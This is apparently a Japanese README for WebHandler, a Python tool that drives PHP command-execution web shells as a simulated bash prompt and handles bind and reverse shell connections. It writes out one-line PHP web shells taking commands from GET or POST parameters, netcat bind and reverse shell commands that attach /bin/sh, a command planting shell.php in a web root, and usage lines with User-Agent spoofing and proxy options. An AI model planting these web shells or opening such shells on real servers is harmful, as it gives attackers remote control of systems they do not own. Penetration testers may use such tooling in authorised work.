
PHPのシステム関数を使用してサーバーを制御するBashシミュレーター
PHPシステム関数用のハンドラーであり、'netcat' ハンドラーの代替でもあります
WebHandlerは、'Linux bash プロンプト'をシミュレートして、以下を処理および実行しようとします:
- PHPプログラム実行関数 _(例: `system`、`passthru`、`exec` など)_
- バインドシェル接続
- リバースシェル接続
もう1つの機能は、HTTPヘッダーの"User-Agent"フィールドを偽装することです。(--random-angent)。
また、HTTPプロキシもサポートします (--proxy http://<ip>:<port>)
WebHandlerはPOSTおよびGETリクエストで動作します:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>WebHandlerはnetcat接続の代替品です。
バインド接続の例 (例: nc -lvvp 1234 -e /bin/sh)
通常、ユーザーは次のようにします:
netcat -l -p 1234nc -lvvp 1234リバース接続の例 (例: nc 127.0.0.1 4321 -e /bin/sh)
通常、ユーザーは次のようにします:
netcat -l -p 4321nc -lvvp 4321--Example ファイル:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php--url は、GETまたはPOSTリクエストを送信する際の必須引数です (例: 'WebベースのPHP' バインド接続):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080--listen は、待機接続を扱う際の必須引数です (例: 'raw' リバース接続):
python webhandler.py --listen 1234Pythonのバージョンが2.7.x未満の場合は、argparseが必要です
インストールするには、sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse または sudo pip --install argparse を実行してください。
readlineはオプションです。 このモジュールは、高度な行編集機能と履歴機能を提供するために使用されます。
gitはオプションです。 これにより、プロジェクトを最新の状態に保つことができます。